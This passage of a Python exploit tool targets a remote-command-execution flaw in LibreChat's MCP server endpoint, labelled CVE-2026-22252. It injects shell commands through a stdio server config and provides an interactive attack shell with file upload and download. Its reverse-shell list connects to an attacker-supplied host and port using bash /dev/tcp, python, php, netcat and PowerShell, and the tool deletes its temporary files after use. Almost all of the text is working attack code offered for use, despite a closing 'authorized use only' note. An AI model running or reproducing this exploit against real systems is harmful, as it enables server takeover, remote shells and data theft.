self.target_info.mcp_requires_admin = True
return False, "Requires admin privileges"
elif response.status_code == 404:
alt_paths = ['/api/v1/mcp/servers', '/api/v2/mcp/servers', '/mcp/api/servers']
for path in alt_paths:
alt_url = urljoin(self.target_url, path)
try:
alt_response = self.session.get(alt_url, timeout=5)
if alt_response.status_code < 400:
mcp_url = alt_url
break
except:
continue
if self.auth_result.success:
headers = {}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
response = self.session.get(mcp_url, headers=headers, timeout=self.timeout)
if response.status_code == 200:
self.target_info.mcp_available = True
try:
test_payload = {
"config": {
"type": "stdio",
"title": "permission_test",
"command": "echo",
"args": ["test"]
}
}
test_response = self.session.post(
mcp_url,
json=test_payload,
headers=headers,
timeout=self.timeout
)
if test_response.status_code in [200, 201]:
return True, "Available for read/write"
elif test_response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Requires admin privileges for write"
else:
return True, f"Read only (POST: {test_response.status_code})"
except Exception as e:
logger.debug(f"MCP permission test failed: {e}")
return True, "Available (write test failed)"
elif response.status_code == 403:
self.target_info.mcp_requires_admin = True
return False, "Forbidden - requires higher privileges"
elif response.status_code == 404:
return False, "Endpoint not found"
return False, f"Unknown status: {response.status_code}"
except Exception as e:
logger.error(f"MCP check error: {e}")
return False, f"Connection error: {e}"
def execute_command(self, command: str, exfil_mode: ExploitMode = ExploitMode.DIRECT) -> Tuple[bool, str, Optional[str]]:
"""Execute command with multiple output extraction options"""
if not self.auth_result.success:
return False, "Unauthorized", None
final_command = self._prepare_command(command, exfil_mode)
mcp_url = urljoin(self.target_url, '/api/mcp/servers')
headers = {
"Content-Type": "application/json",
}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token
payload = {
"config": {
"type": "stdio",
"title": f"cmd_{self._generate_random_string()}",
"command": self._get_shell_path(),
"args": ["-c", final_command]
}
}
try:
logger.info(f"Sending command via MCP...")
response = self.session.post(
mcp_url,
json=payload,
headers=headers,
timeout=self.timeout
)
if response.status_code in [200, 201]:
output = self._retrieve_output(command, exfil_mode)
return True, "Command executed successfully", output
else:
error_msg = f"Execution failed: {response.status_code}"
if response.text:
error_msg += f" - {response.text[:200]}"
return False, error_msg, None
except requests.Timeout:
return False, "Timeout - command may still be executing", None
except Exception as e:
logger.error(f"Execution error: {e}")
return False, f"Error: {e}", None
def _prepare_command(self, command: str, exfil_mode: ExploitMode) -> str:
"""Prepare command based on extraction method"""
random_suffix = self._generate_random_string()
if exfil_mode == ExploitMode.DIRECT:
return f"({command}) 2>&1"
elif exfil_mode == ExploitMode.FILE:
temp_file = f"/tmp/cmd_out_{random_suffix}.txt"
return f"({command}) 2>&1 > {temp_file} && echo 'OUTPUT_SAVED:{temp_file}'"
elif exfil_mode == ExploitMode.NETWORK:
return f"({command}) 2>&1 | base64"
elif exfil_mode == ExploitMode.ENCODED:
return f"echo 'START_OUTPUT' && ({command}) 2>&1 | base64 -w0 && echo 'END_OUTPUT'"
return f"({command}) 2>&1"
def _get_shell_path(self) -> str:
"""Get appropriate shell path"""
if self.target_info.os_type == "windows":
return "cmd.exe"
elif self.target_info.shell_type == "bash":
return "/bin/bash"
else:
return "/bin/sh"
def _retrieve_output(self, original_command: str, exfil_mode: ExploitMode) -> Optional[str]:
"""Retrieve command output"""
output = None
try:
if exfil_mode == ExploitMode.DIRECT:
pass
elif exfil_mode == ExploitMode.FILE:
find_cmd = f"find /tmp -name '*cmd_out_*.txt' -mmin -1 2>/dev/null | head -5"
success, files_output = self._execute_simple_command(find_cmd)
if success and files_output:
for line in files_output.split('\n'):
if line.strip():
read_cmd = f"cat {line.strip()} 2>/dev/null && rm -f {line.strip()}"
success, content = self._execute_simple_command(read_cmd)
if success:
output = content
break
elif exfil_mode == ExploitMode.ENCODED:
log_cmds = [
"dmesg | tail -20 2>/dev/null",
"journalctl --no-pager -n 20 2>/dev/null",
"cat /var/log/syslog 2>/dev/null | tail -20",
]
for log_cmd in log_cmds:
success, log_output = self._execute_simple_command(log_cmd)
if success and "START_OUTPUT" in log_output:
start = log_output.find("START_OUTPUT") + len("START_OUTPUT")
end = log_output.find("END_OUTPUT")
if end > start:
encoded = log_output[start:end].strip()
try:
import base64
output = base64.b64decode(encoded).decode('utf-8', errors='ignore')
except:
output = encoded
break
except Exception as e:
logger.debug(f"Output retrieval failed: {e}")
return output
def _execute_simple_command(self, command: str) -> Tuple[bool, str]:
"""Execute simple command (for extraction)"""
try:
success, msg, output = self.execute_command(
command,
exfil_mode=ExploitMode.ENCODED
)
return success, output if output else ""
except:
return False, ""
def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:
"""Test vulnerability accurately and safely"""
test_id = self._generate_random_string(12)
test_file = f"/tmp/librechat_test_{test_id}.txt"
test_command = f"""
echo "=== TEST START {test_id} ===" &&
id &&
echo "---" &&
whoami &&
echo "---" &&
pwd &&
echo "---" &&
uname -a &&
echo "=== TEST END {test_id} ==="
"""
logger.info(f"Testing vulnerability (ID: {test_id})...")
for exfil_mode in [ExploitMode.ENCODED, ExploitMode.FILE, ExploitMode.DIRECT]:
logger.debug(f"Trying method: {exfil_mode.value}")
success, message, output = self.execute_command(test_command, exfil_mode)
if success:
logger.info(f"[ok] Execution successful with {exfil_mode.value}")
if output:
if test_id in output:
logger.info(f"[ok] Results verified")
return True, f"Vulnerability exists and exploitable (method: {exfil_mode.value})", output
else:
logger.debug("Results don't contain expected identifier")
return True, f"Vulnerability exists (execution successful)", output
time.sleep(1)
file_test_command = f"echo 'VULN_TEST_{test_id}' > {test_file}"
check_command = f"cat {test_file} 2>/dev/null && rm -f {test_file}"
success1, msg1, _ = self.execute_command(file_test_command, ExploitMode.DIRECT)
time.sleep(1)
success2, msg2, output = self.execute_command(check_command, ExploitMode.ENCODED)
if success1 and success2 and output and f"VULN_TEST_{test_id}" in output:
return True, "Vulnerability exists (file test successful)", output
return False, "Vulnerability not found or not exploitable", None
class InteractiveExploitShell:
"""Enhanced interactive interface"""
def __init__(self, exploit: LibreChatExploit):
self.exploit = exploit
self.running = True
self.command_history = []
self.session_id = hashlib.md5(str(time.time()).encode()).hexdigest()[:8]
signal.signal(signal.SIGINT, self._signal_handler)
signal.signal(signal.SIGTERM, self._signal_handler)
self.rate_limit = 1.0
self.last_command_time = 0
self.output_mode = ExploitMode.ENCODED
def _signal_handler(self, signum, frame):
"""Handle system signals"""
logger.info(f"\n[!] Received signal {signum} - safe termination...")
self.running = False
def _check_rate_limit(self):
"""Check rate limiting"""
current_time = time.time()
time_since_last = current_time - self.last_command_time
if time_since_last < self.rate_limit:
sleep_time = self.rate_limit - time_since_last
logger.debug(f"Rate limiting: wait {sleep_time:.2f} seconds")
time.sleep(sleep_time)
def _cleanup_temp_files(self):
"""Clean up temporary files if possible"""
cleanup_cmd = "find /tmp -name '*librechat_*' -mmin +5 -delete 2>/dev/null"
self.exploit.execute_command(cleanup_cmd, ExploitMode.DIRECT)
def run(self):
"""Run interactive interface"""
print(f"\n{'='*60}")
print(f"LibreChat MCP RCE - Session: {self.session_id}")
print(f"Target: {self.exploit.target_url}")
print(f"User: {self.exploit.auth_result.user_role}")
print(f"{'='*60}")
print("Type 'help' for full menu")
while self.running:
try:
self._check_rate_limit()
prompt = f"\nexploit[{self.session_id}]> "
try:
cmd = input(prompt).strip()
except (EOFError, KeyboardInterrupt):
print("\n[*] Ending session...")
break
if not cmd:
continue
self.last_command_time = time.time()
self.command_history.append(cmd)
if len(self.command_history) > 50:
self.command_history.pop(0)
if self._handle_special_commands(cmd):
continue
self._execute_user_command(cmd)
except Exception as e:
logger.error(f"Interactive interface error: {e}")
time.sleep(0.5)
self._cleanup_temp_files()
print(f"\n[*] Ending session {self.session_id}")
def _handle_special_commands(self, cmd: str) -> bool:
"""Handle special commands"""
cmd_lower = cmd.lower().strip()
if cmd_lower == 'exit' or cmd_lower == 'quit':
self.running = False
return True
elif cmd_lower == 'help':
self._show_help()
return True
elif cmd_lower == 'history':
self._show_history()
return True
elif cmd_lower == 'status':
self._show_status()
return True
elif cmd_lower == 'mode':
self._change_output_mode()
return True
elif cmd_lower == 'clear':
os.system('clear' if os.name != 'nt' else 'cls')
return True
elif cmd_lower.startswith('shell '):
self._handle_reverse_shell(cmd)
return True
elif cmd_lower.startswith('upload '):
self._handle_file_upload(cmd)
return True
elif cmd_lower.startswith('download '):
self._handle_file_download(cmd)
return True
return False
def _show_help(self):
"""Show help menu"""
help_text = """
╔══════════════════════════════════════════════════════════╗
║ LibreChat RCE Commands by indoushka ║
╚══════════════════════════════════════════════════════════╝
Basic Commands:
help Show this menu
exit / quit Exit session
status Show system status
history Show command history
clear Clear screen
mode Change output display method
Advanced Commands:
shell [LHOST] [LPORT] Create reverse shell
upload [local] [remote] Upload file
download [remote] [local] Download file
System Exploration:
pwd Current directory
ls [path] List files
cat [file] Show file content
Information Gathering:
id User information
whoami Username
uname -a System info
ps aux Running processes
Note: Use ';' to separate multiple commands
"""
print(help_text)
def _show_history(self):
"""Show command history"""
if not self.command_history:
print("[*] No commands in history")
return
print("\nCommand History (newest first):")
print("-" * 50)
for i, cmd in enumerate(reversed(self.command_history[-10:]), 1):
print(f"{i:2d}. {cmd[:60]}{'...' if len(cmd) > 60 else ''}")
print("-" * 50)
def _show_status(self):
"""Show system status"""
print(f"\n{'='*50}")
print("System Status:")
print(f"{'='*50}")
print(f"Target: {self.exploit.target_url}")
print(f"Version: {self.exploit.target_info.version or 'unknown'}")
print(f"User: {self.exploit.auth_result.user_role}")
print(f"OS: {self.exploit.target_info.os_type}")
print(f"Shell: {self.exploit.target_info.shell_type}")
print(f"CSRF: {'enabled' if self.exploit.target_info.csrf_enabled else 'disabled'}")
print(f"MCP: {'available' if self.exploit.target_info.mcp_available else 'unavailable'}")
print(f"Requires admin: {'yes' if self.exploit.target_info.mcp_requires_admin else 'no'}")
print(f"Output method: {self.output_mode.value}")
print(f"{'='*50}")
def _change_output_mode(self):
"""Change output display method"""
modes = list(ExploitMode)
print("\nAvailable output methods:")
for i, mode in enumerate(modes, 1):
print(f" {i}. {mode.value}")
try:
choice = input("\nChoose number [1-4]: ").strip()
if choice.isdigit() and 1 <= int(choice) <= len(modes):
self.output_mode = modes[int(choice) - 1]
print(f"[ok] Changed to: {self.output_mode.value}")
else:
print("[!] Invalid choice")
except:
print("[!] Choice error")
def _handle_reverse_shell(self, cmd: str):
"""Handle reverse shell command"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: shell [LHOST] [LPORT]")
return
lhost = parts[1]
lport = parts[2]
if not lport.isdigit():
print("[!] Port must be a number")
return
print(f"\n[*] Preparing reverse shell to {lhost}:{lport}")
print("[*] Make sure listener is running:")
print(f" nc -lvnp {lport}")
print("\n[*] Attempting...")
shells = []
if self.exploit.target_info.os_type == "linux":
shells = [
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
f"python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"{lhost}\",{lport}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
f"php -r '$s=fsockopen(\"{lhost}\",{lport});exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
f"nc -e /bin/sh {lhost} {lport}",
]
elif self.exploit.target_info.os_type == "windows":
shells = [
f"powershell -c \"$c=New-Object System.Net.Sockets.TCPClient('{lhost}',{lport});$s=$c.GetStream();[byte[]]$b=0..65535|%{{0}};while(($i=$s.Read($b,0,$b.Length)) -ne 0){{;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+'PS '+(pwd).Path+'> ';$sbt=([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()}};$c.Close()\"",
]
for i, shell_cmd in enumerate(shells, 1):
print(f"\n[*] Trying shell #{i}...")
success, message, _ = self.exploit.execute_command(shell_cmd, self.output_mode)
if success:
print(f"[ok] Shell sent successfully")
print("[*] Wait 5 seconds for connection...")
time.sleep(5)
break
else:
print(f"[no] Failed: {message}")
def _handle_file_upload(self, cmd: str):
"""Upload file to server"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: upload [local file] [remote path]")
return
local_file = parts[1]
remote_path = parts[2]
if not os.path.exists(local_file):
print(f"[!] Local file not found: {local_file}")
return
try:
with open(local_file, 'rb') as f:
content = f.read()
import base64
encoded_content = base64.b64encode(content).decode('utf-8')
upload_cmd = f"""
echo '{encoded_content}' | base64 -d > "{remote_path}" &&
echo "UPLOAD_SUCCESS: {remote_path}" ||
echo "UPLOAD_FAILED"
"""
print(f"[*] Uploading {local_file} to {remote_path}...")
success, message, output = self.exploit.execute_command(upload_cmd, self.output_mode)
if success and output and "UPLOAD_SUCCESS" in output:
print(f"[ok] File uploaded successfully")
else:
print(f"[no] Upload failed: {message}")
except Exception as e:
print(f"[no] Upload error: {e}")
def _handle_file_download(self, cmd: str):
"""Download file from server"""
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: download [remote path] [local file]")
return
remote_path = parts[1]
local_file = parts[2]
download_cmd = f"""
if [ -f "{remote_path}" ]; then
cat "{remote_path}" | base64 -w0;
echo "";
else
echo "FILE_NOT_FOUND";
fi
"""
print(f"[*] Downloading {remote_path} to {local_file}...")
success, message, output = self.exploit.execute_command(download_cmd, ExploitMode.ENCODED)
if success and output and output.strip() and "FILE_NOT_FOUND" not in output:
try:
import base64
content = base64.b64decode(output.strip())
with open(local_file, 'wb') as f:
f.write(content)
print(f"[ok] Downloaded successfully ({len(content)} bytes)")
except Exception as e:
print(f"[no] Decryption error: {e}")
else:
print(f"[no] Download failed: {message}")
def _execute_user_command(self, cmd: str):
"""Execute user command"""
print(f"[*] Executing...")
start_time = time.time()
success, message, output = self.exploit.execute_command(cmd, self.output_mode)
elapsed = time.time() - start_time
if success:
print(f"[ok] Executed ({elapsed:.2f} seconds)")
if output and output.strip():
print(f"\n{'='*50}")
print("Output:")
print(f"{'='*50}")
print(output[:5000])
if len(output) > 5000:
print(f"\n[...] Output truncated ({len(output)} chars)")
print(f"{'='*50}")
else:
print(f"[no] Failed: {message}")
def main():
parser = argparse.ArgumentParser(
description='LibreChat MCP RCE Exploit - Final Version',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -u http://localhost:3080 --check
%(prog)s -u http://target.com --test
%(prog)s -u http://target.com -c "id"
%(prog)s -u http://target.com --interactive
Warning: For legal and ethical use only.
Written authorization required before testing any system.
"""
)
parser.add_argument('-u', '--url', required=True,
help='Target URL (e.g., http://localhost:3080)')
parser.add_argument('-c', '--command',
help='Command to execute')
parser.add_argument('-f', '--command-file',
help='File containing commands to execute')
parser.add_argument('--test', action='store_true',
help='Test vulnerability only')
parser.add_argument('--check', action='store_true',
help='Check system only')
parser.add_argument('--interactive', action='store_true',
help='Interactive mode')
parser.add_argument('--username', default='test_user',
help='Username (default: test_user)')
parser.add_argument('--password', default='Test12345!',
help='Password (default: Test12345!)')
parser.add_argument('--email', default='[email protected]',
help='Email (default: [email protected])')
parser.add_argument('--timeout', type=int, default=30,
help='Timeout in seconds (default: 30)')
parser.add_argument('--verbose', '-v', action='store_true',
help='Show detailed information')
parser.add_argument('--output-mode', choices=['direct', 'file', 'encoded'],
default='encoded', help='Output extraction method')
args = parser.parse_args()
if args.verbose:
logging.getLogger().setLevel(logging.DEBUG)
print("="*60)
print("LibreChat MCP RCE Exploit by indoushka")
print("CVE-2026-22252")
print("="*60)
try:
exploit = LibreChatExploit(args.url, args.timeout)
print("[*] Checking target system...")
target_ok, target_msg = exploit.check_target()
if not target_ok:
print(f"[no] {target_msg}")
sys.exit(1)
print(f"[ok] {target_msg}")
print(f"\n[*] System Information:")
print(f" - Version: {exploit.target_info.version or 'unknown'}")
print(f" - OS: {exploit.target_info.os_type}")
print(f" - Shell: {exploit.target_info.shell_type}")
print(f" - CSRF: {'enabled' if exploit.target_info.csrf_enabled else 'disabled'}")
if exploit.target_info.public_paths:
print(f" - Public paths: {', '.join(exploit.target_info.public_paths)}")
print("\n[*] Checking MCP endpoint...")
mcp_ok, mcp_msg = exploit.check_mcp_endpoint()
print(f"[*] MCP: {mcp_msg}")
if not mcp_ok and "requires authentication" not in mcp_msg:
print(f"[!] Warning: {mcp_msg}")
if not args.interactive:
sys.exit(1)
if args.check:
sys.exit(0)
if args.test:
print("\n[*] Testing vulnerability...")
vulnerable, vuln_msg, output = exploit.test_vulnerability()
if vulnerable:
print(f"[ok] {vuln_msg}")
if output:
print(f"\n[+] Sample output:\n{output[:500]}")
else:
print(f"[no] {vuln_msg}")
sys.exit(0)
if args.command:
output_mode = ExploitMode(args.output_mode)
print(f"\n[*] Executing command: {args.command}")
success, message, output = exploit.execute_command(args.command, output_mode)
if success:
print(f"[ok] {message}")
if output:
print(f"\n[+] Output:\n{output}")
else:
print(f"[no] {message}")
elif args.interactive:
shell = InteractiveExploitShell(exploit)
shell.run()
else:
print("\n[!] No action specified. Use --help for help")
except KeyboardInterrupt:
print("\n\n[*] Interrupted by user")
sys.exit(0)
except Exception as e:
logger.error(f"Unexpected error: {e}")
sys.exit(1)
if __name__ == "__main__":
main()
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================